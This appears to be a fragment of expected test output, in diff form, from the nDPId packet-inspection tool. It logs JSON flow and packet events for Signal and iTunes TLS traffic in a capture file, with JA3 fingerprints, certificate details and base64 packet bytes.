{"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) 
Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569051248547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051248547,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTAAAP8RkXUAAAAA\/\/\/\/\/wBEAEMBNJw9AQEGACG6jqoABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569051253252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051253252,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTEAAP8RkXQAAAAA\/\/\/\/\/wBEAEMBNJw4AQEGACG6jqoACQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569051264073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264073,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKMBLAbsF0WXIAAAAALAC\/\/9prAAAAgQFtAEDAwYBAQgKKFWN0AAAAAAEAgAA"} 